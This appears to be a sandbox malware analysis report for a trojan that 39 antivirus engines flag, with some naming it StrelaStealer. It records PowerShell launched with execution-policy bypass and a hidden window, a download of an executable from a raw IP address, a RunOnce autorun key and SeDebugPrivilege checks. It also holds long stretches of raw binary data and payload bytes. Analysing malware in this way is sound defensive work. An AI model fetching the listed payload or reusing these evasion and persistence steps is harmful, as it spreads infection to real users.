¿\|W¡æ¼CêÝJ?0Q¼O3SòMHÝÂ_±¨Z 0'
Data received	ÅRg<e=8lõÛ&éF2Û !Ûâ¿ oJ-^òúüÏ.ðÝmQ\|9Cc`=ÇÈÚq7î¸eà´Ê.FùEÖlKõÚ¬¡ZâQbÃR¼Ýï+%ø¾z£°Sp£ó ãÎeX±óC=GÈ¦î¦ÎËeSmfTô©rTTps'Nl>_¸©sÓðª9n9}PuÖ!Ñ>ä@4P{ÊeI¦¬Ú_¶+ôÈÆx"f¥I·¨ûF®Ùù&9¶¡ÕaÍðý¼ÜT ¸ni`IÜ¦ËÊÝ=Z&j¬ËR´&ô» UX9¸àÊ÷JÓ0«}æôIÖOÃ"ØjÛzÛuI ÑKVÅxj.qjH¡Á}Àå0nÂIu~³UL£ÅåñsÉëÖ¦&ÖÌ¨¾c~^¥°¡×ÿâ5ËÏGR¶¶ÔKZ¯ô^Â¤®"?'S ¶À.½Ï©%öîíY1ÏB@´8·¥ó\º©K±Ö ð· ±Hg8i£>êW¥y(m#Â3Ç%?¥½í.ü4?ÃÍ<[íMØ¡¸¡ Bö!ÈOß$GW½Æ{ 1yDÿ{W=ü ¿-Ïn÷ VWOh$sAÝåªó"h`+ ÞÏÒ¥¨ù+úhbæêgõTa! ÿ©Õí0ª·Ø¬é¾§¢èBh'´uZ¦%¯ûýPÀïÒ ·Þq¥ó±jô£dàï-f½[oôâ=Ga¸å¿N!wÅ¶çÿI®q¶×,÷ðTåíÏÚq¤§âd6Ýæ^²Ï )"·Øã¾ë%P1X),L[Ï+\"¯8»Ð&1? AO;ÉYg½ÑKoñâçÚäj"EPao³yKî³n1aüu¨i4ßWúyÙÅÿº[Íá¡[%Y¥ÁÌît§ a%ÞMbCS @LEôzêõ¥þú"FC`.V:¦%ZPGa#UéÉ [¹æ6cMý0®w¾6¿,Vfvî³^6jì'ßT÷ÿ%n®Ë¬T®5½£~½tÉ?"?#"ûíw¥#àÀ¦È°°Äåð+dÝ¯¹Ï÷ã¼nåqMaÈuæB^]±ª¸R·O[fD%ø\|BTËçSùyê[ÿö]8Ø§eï(fáÇõ\|µzRZo.3ÞFÌ6¼D+Â\|ºw9?êVX$7ÃfYwÊ@cÓ!AÛË£ 6ÓßZ¥lk¦(HØáÀ aýQÊUb^ \Èõ>a¸újÌÒ ° ºÐéoùJ÷í³[i,ºi}{5\|´ü#hB@tËÁY¨yÕ®R íf©\|{iwÑã½g}@%¸Xß÷ n÷:U7']2àÝ4×øÅ¡¤áæ`Ì ×øcúJØÄÉa«ØNûþùµal~©Sÿý <ÉØñºÆrTz}ËÀªw±½êQdcÉu·Ï8úµ¨ÖÂRìëLïéW¯ËÂ-%I¢¢ÕO^?ÇêK×hÜBxH·ö9ÕÿÍ¢mtîåU×Â×;ÒÚ0çoxÍÁª àNgT:êå'¤d¦YfÚ«#´65ÇA¯Ý{ÑÞ _À_×¢`ÝiÙI÷Õà\|ÔmB0lÜi=cbâÛ\QÉ¬/°8Í}:Yk¢ñ² ÎcDJ¤jÖXRÑØ¿xèË7ýd$â)» ÇîºâDïU´9M)º¥0B÷98O:g«Øÿùüõ=Ð95%£gÉ5ñÔ#ìô)Ý8®6ìØqÖÉÔi³«E°Kµc%^@æ¾¢!_hPKÒ¾Xó½ ô´¶3Qf¾«n[¯Ïö¼øÐ¨®ØÞJPGñ^¸¨Ù¸¶Ù7i=>ÇÊv<C<{>ÁfT@Ï«qÒÈ'¢GË?hUÇ6Æþ)ÊðçÿÇÀÐRxèüi~Ãsó¼ã9MM¾«ÐÁJ^fÇ ßõ-Hq#®v:áU9®¥¤ä~,pëiAÉqõÜÒ°]¥HÜÉÑ)$)¼M¾zú ^ÜìF3d_5Só×£}¤u²¼ìÿ(TwIéHàqïÐÝ'½Òpt ºu~zGsqôéÝ.CÛG=' @IvüZ!Vµá±ïWuÏ½ØP¶H\|B=È9¤ÆK ýïPz6 ÷#¼§_^ðIlwÅ5ÿØB\¤'Ï(¼®Ã¯´â£0}äÆaÛC: ü7Wu¿òTÄb?¶îÆOø ÜEÀÄ¡¦7n.!Æt÷öi-é"£OØPµÞán-M O·¯rR&!Õýl¤JwèYdP4\Fj%êà¹¢ 5½Ìq?±±K©(ôî«ì bãKVÞ;Y££oJyÞÓ¯JMÀ@ÏL¢3ÁãÓ×êøÝh `o¯îäÕVlI_'õ²ÔÄJ£=ÖÿNè=»öü585§¹^Àïó°ÇÞtÍgª Ë;½¹!3¡5ÃËâC¥<NXDÖ ¸o·ðî^µ¤¥y ¢º¹ÍErHx Æ-M%c&UÈåM4ñø9vó$ù!§ÅÈRIÒW~æ»ÀÞc¹§ú»óÇ]Ñ·\©U¬vÆa@nçÖ¬7I1\|3xgy¬-A+w¯²PÎ"eBú¹lr£ªÅiÝUXÏµ¸?âk³lÿJ/NügÒÂ^¥íêwÄbý À6ïÖä>«d;ÿl[äG X ¯E_¬XD¬ÝÇÍßº#72JÙeÅ eólx¼ÌoHùv ½õS©(^Þn[âl2¤ð98 ºjLok½E;){öf¹)p`á$¬j#9Ç½iìÍÜÃüýOO§6¡/o4Þ'ÿ,¦¾ßw´yøZìÕÛIÆÁ£!Z1ü`lÛG¯K[f¹ñ_Tk`á3ÎK R:xoR^øHAOÃâa%"aJ(Æè¼mlÛÑ³gU0<°pB\<g?"-{øg<ÞFZ/½ôlFZx$¿²(óót+öWkß÷'.í/~·ZZQ}zð«¨ÌxÄ>&Íc¼+ºL·Î`4öf¸7Ì¶ÃpãEÂÔ¡Ì Ïå#[rQÕ¿ÿf÷·f>µÆ$ÌàÙå4 iÈ(ç YWñEVn1çáÃ}Õ{é>ÉjÑ:O{©öC" º]É©L(X²ú\Ø0ÌhcèQî ÷ço§GrS¬5R2#ðÓ\£íðð<¯ZGB{å+'µLîòÆ:ÍB"v¶}=³ jÜ½§Å-,ä}Y½Ò+®eÒßDSÝöTZÒæbqµàÄ¹bØ®2`¼ÎQ¥ûvsy/G¸¿Tß¬ÀÇ¯}M¬è¼ÇõKEþ§Z¥0ùs<Ë
Data received	b2Ié¼ ¶ÚPiArå _±ùs²3Ëx<ù)^Þ´:¢8#'¬é2kÕ[¸Mcl038^\x,EjÝ.ÉëExúÍH\è²/@}tûÝ¼Y(!ÕTp®?Ú±lª+èº«x0¶Á£¢àRÍ£5ÛïBý$eýy×ª%°ò4mâ¾ö®ô?(Ä£Ì¤'5Cöqz¬&ÔL§\|r& fç¹Wá/dÕlå¿9Í§ðn&heÛ9#cÔÑ_Qãnl®æüiÆÉ:&Cg2¾ÊÕèRXAùë¿ÝRÜ`2ÍI6ul#H6¬ì:ô_ÚªwfTþÜ14?>> üÕ~äñ2ð÷£Ôó#´J;mÅ÷³ÿF·PV½EZþß»¿éIä>ôÆC¸à¼Y#ò gíí¤ÍPïóXzAw~9°¡úÀÓHW°`n§ê²nàÈaébUð½FêÑ¯±³3ê<¬øt{ßÝRå>}iÇ\|ÆÐù³ÕkhätðB:Ùs÷»nË+Ø§xGUe¶/ Ðu&&¦ÙstÒ¼ëõZ{òs(CÆñ¦ÑýYmc%½ÊVh¾b"XÕ)S©8/ò¹#F.ù9Aüî{pÃ_¾åÿòØM>..Íz()P²ÓLÌ Ð«ÉjºÁ¦8ä ËZ»xÉbE¹1¤2l.°Kß8m¼øà8_¦`ì³hzzf"gÔMFyMj;µWÊyã #Ú l>Ð£!Ù×Ë³"öÞóí6iBÞ!ys=K+¤PÍç6¨;ýêhnÍå×\;ó³à1¨ñáá}êujóuwÞ"±èì1¸õiÞë¹p¨ÏAðä×ôEwõÉÉµK°=èaXWðxP=ä©ë8X ,»°JôÁëû]§Ý ×Am8'ÖÀDÅ =)X¼1^iÆËÓ¬þ¬Dè¬¤3Ì¿âÆÏ+§ló6>Äï×í:$ÍûÕ!Kb3C~·Ïx¹4"Ka7ÓªýÊ²üyfu8ýGê¦AÇù9G f^ÂO4º}57 ÖU"c=gª[¯gÒ'þl)TÖÎ©Xß,¬]ÿú¨u\|MÌMXõÚÁ?â°dÌ·Ê\gö¼kf}Ì{º`Â, ´ë©É,!× å½ÊÒ¬Kd¥fßÞbé¡æµÙÇûâ$«EtÌ ¹KÂÉpö¬[#á3U.µ1b»o^Îä¡Êøÿ´açØ½6fWÞñµ JÃz§©ñ¿cj-?0äA3øúb¹,ÛÌÿÏÌÅÞ,â=eFÄ9,SJ'®m>áÛ·äJÐ¯_x¡Çµ+ÐÐ½,4F ßtpÄLú£ÌÉo_ÓàÜUl÷{Md:$ÓÐk³^1 1$ÞÀ8ÀÿÌù{ÛMX9Ëÿ:µ¬ª5yÁâ®µÆì÷§ \å)x¥ÀÑó'§3i+nªÉÔ-¤Í6DjÒÄþxL+¼AJyÈ5^0$@ÇOÛ6¡#,Hï¢ò¨r%m;%à²àöªýt»ûÕ{;q²7,úäÁ_4Å86åiÚN`iðèía/Æ\|\;'Èá]uÚ'ó5©Sëû.±~<~i.óL¢ÌTëó§îùzÂHãòÍÃRJ)¥\÷Øc¦g_øD"þèTXÍ0¡¤oúýÏ`ß/l\|¦q¼¤Ùµ'%TÖÔ']o1ÜUøÅnÛòQHx\|Õ+¢sß^wF\|m¥h·]Ì0ú¨ç4ÉÚÁùSà_ Ï¥ßÐ7yEu¸&Ô¾xqC®ß¢0Ä]RÆºòK}üN¢,HH$Y$¶Ê~Mtf`¹}+ÄÈrÅy~§Öfün.Qï«8ÝºFP£³Rüì2´}ÒÛ«'OàÉyÀæWi·xè(]©ìÐt4_ K'×aæMª{£7}fø¹LÙ(áèÂ±Ú~d¦)våYÂÚª^³+µ"²¯%$¼¢ñ!ZÞ&ýòL}´clµTÓK÷U7&F\|êù¶G%YVÁ xNiºF+VéQÀê-ºeÒ@0ÖôI`å¼öîK.jßìM½8Ôòw±ºþ¼½þóÙ-J"gÆ ÊÀ½æ´·733Y£Ë^Êü· ÙLÞN)Ú·þBÖH÷rðOê+\|<Q6Ãü®»T:Ñ$=^c'·ôp§¶Í%fMDwðÍµja¤ûÁúá¿#Lj!eÍ0§ÞÌÏoÛýÔEÍT]%ÌfM` IéáöòS>YffwõFtm°pòÐÝÆø!ç N«^D·sNRÐt{¶Nåïß@(pÍ,Ü£HÃZ»/µYæjÞ =æózàÿ@AÍeC\¸f2±É³rÍ]äõóù_Ç]m¡v¾Ãf\J<Ó!:KºVäGM,²äï¨OAð1EÔKf³ÂÇàò"òý°Z~âjÕJ#0ØàNùàîà)NI:5¨°èôgs¤I¬?ÖgÉ´^ Ý°¢È°Eb×i{b$#ÇÓÿ ËXp0ªK4£Ê´Ë²8,I¤Ö=i¬£M4Ä<%(Ðè;)?Í¤Í\|d±ÊÐÒÕs¢£e½}«+¬KÊÁF¸SÂãA'-ô6Mko¾{icX_®g)£èëOÜýñ0Z{øReW(¶s»ö¶oÞ¯!_¢¬û4ÛÍÜòµ²-}Í;¿k]mj"Ù1dÿÀSÉØcë ´;ÂÑrâýB&>ë·~à\|+5²âö:ZévÅjuç,ÍßÉár1ö°ûgÖ+=+É4Äv{§¯ßî÷v»¤6Çw¸{,®R¹RLM§8ëg[¬ãÉö(µGþøw\|ö2) OvUþ<²nJÞ¸# ³ð¦ùÌHÎùâØÑÀ!7 3I\|4XîJ²ÅpÝzÿ:ÅÕ,%ò+/ê ç`[â0¡Å8NóÚ6Py¿í£ÐÕFÇcwLí¬ÒótJ?¡ûÜùd¨v6´JP{nýwãÓ¨¬íýCÁ=Á é`@ÁÀÿaætL¸Tä<1üÉ µèÔÉªõô¼þRAÑ8ü s9¦å¶j>KV£ZËT;üó ü `±»þÑ±nuõ@¢t]RúìñÒ-YÆÒB_b ¡$õP@8)ã®cøZfü;Å¾RcIvvÍn!_ðùý5l9~êüKÃ¬¥\á%(Ôy>1õwM9ö?ë§r4ì<gà7 `Å}ï}½2ÛÍ¾ÆØM9¿Ï-ËzPv°º¾·yß»ÑÓHå¯¬¨ª íRðVÓQÜ§½ÂåM\|ºÈ1°rlé¼öºøØã³bã

Poweshell is sending data to a remote host (1 event)

Data sent

GET /a0001/tg01985462.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Host: 23.27.46.60 Connection: Keep-Alive

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW March 3, 2025, 2:43 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

23.27.46.60

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

reg_value

rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send March 3, 2025, 2:43 p.m.	buffer: GET /a0001/tg01985462.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Host: 23.27.46.60 Connection: Keep-Alive socket: 1248 sent: 204	1	204	0

An executable file was downloaded by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv March 3, 2025, 2:43 p.m.	buffer: HTTP/1.1 200 OK Date: Mon, 03 Mar 2025 05:49:24 GMT Server: Apache/2.4.58 (Ubuntu) Last-Modified: Wed, 26 Feb 2025 12:45:21 GMT ETag: "174a00-62f0af24b2372" Accept-Ranges: bytes Content-Length: 1526272 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELa¿gàhàÞ @ 8`K öÜ H.textäf h `.rsrcöÜ Þj@@.relocH@BÀHTWH6æø(0¸ þ8þE9d8 \|( } ~{8:½ÿÿÿ& 8²ÿÿÿ( } ~{e9ÿÿÿ& 8ÿÿÿ\|(+ ~{69eÿÿÿ& 8Zÿÿÿ0z þ8þE+,8&( ~{4:Ïÿÿÿ& 8Äÿÿÿ(o ~{-9£ÿÿÿ& 8ÿÿÿ&~þ~0/( }}\|(+\|( 0/( }}\|(+\|( 0Â þ8þE 8($ o% ~{,:& 8þE8ÝW& ~{[9& 8þE8s# z ~{29^ÿÿÿ& 8Sÿÿÿ%Ch8&~þ~0 þ8þER+8Ms ~{j:Ïÿÿÿ& 8Äÿÿÿ} ~{O:¨ÿÿÿ& 8ÿÿÿo& þs' (+%() 9s# z&~þ~0ò þ8þE8:; ~{C:& 8þE:8s# z o- & ~{W9Äÿÿÿ& 8¹ÿÿÿÝÿÿÿ& ~{N:& 8þE8s# z ~{t:+ÿÿÿ& 8 ÿÿÿ&u8&~þ~( 0 þ8þE.48)~: ~{>9Ìÿÿÿ& 8Áÿÿÿ~rpÐ(. o/ s0 ~{h9ÿÿÿ& 8~ÿÿÿ~*j(#rép~o1 t&~þ~09}"( }}{( +\|( 0 þ8þE984(>z~&o7 ~{5:Áÿÿÿ& 8¶ÿÿÿ:Ëÿÿÿ ~{c:ÿÿÿ& 8ÿÿÿ .rÿps8 (* 0_ þ8þE?8:~(þEs9 s: & ~{\:¿ÿÿÿ& 8´ÿÿÿ&~'þ~'0 þ8þE.X,8)þ} ~{y:Æÿÿÿ& 8»ÿÿÿ& 8þE'8":Õ ~{:& 8þEèn}Ö received: 2920 socket: 1248	1	2920	0

Creates a suspicious Powershell process (3 events)

option	-ep bypass	value	Attempts to bypass execution policy
option	-nop	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

The process powershell.exe wrote an executable file to disk (19 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

File has been identified by 39 AntiVirus engines on VirusTotal as malicious (39 events)

Lionic	Trojan.Win32.Boxter.4!c
CAT-QuickHeal	Trojan.Multi
Skyhigh	BehavesLike.Win64.Generic.dc
Cylance	Unsafe
VIPRE	Heur.BZC.MNT.Boxter.928.7DEF2DEE
CrowdStrike	win/malicious_confidence_70% (W)
BitDefender	Trojan.GenericKD.75922583
Arcabit	Trojan.Generic.D4867C97
Symantec	Trojan.Gen.MBT
Elastic	malicious (high confidence)
ESET-NOD32	a variant of Generik.KWGDLJL
APEX	Malicious
Avast	Other:Malware-gen [Trj]
Kaspersky	UDS:DangerousObject.Multi.Generic
MicroWorld-eScan	Trojan.GenericKD.75922583
Emsisoft	Trojan.GenericKD.75922583 (B)
F-Secure	Trojan.TR/AVI.Agent.tdmwq
TrendMicro	TrojanSpy.Win64.STRELASTEALER.YXFB1Z
McAfeeD	ti!AE577A74A454
CTX	exe.trojan.boxter
Sophos	Mal/Generic-S
Ikarus	BZC.MNT.Boxter
FireEye	Trojan.GenericKD.75922583
Google	Detected
Avira	TR/AVI.Agent.tdmwq
Kingsoft	Win32.Troj.Unknown.a
Microsoft	Trojan:Win32/Wacatac.B!ml
GData	BAT.Malware.InvalidBOM.A
Varist	W64/ABRisk.PABB-6286
AhnLab-V3	Trojan/Win.Malware-gen.C5735417
McAfee	Artemis!73FF43923990
DeepInstinct	MALICIOUS
Malwarebytes	Malware.AI.4234042608
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TrojanSpy.Win64.STRELASTEALER.YXFB1Z
Tencent	Win32.Trojan-Downloader.Agent.Vimw
Fortinet	PossibleThreat.MU
AVG	Other:Malware-gen [Trj]
Paloalto	generic.ml

tg01985462ss.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All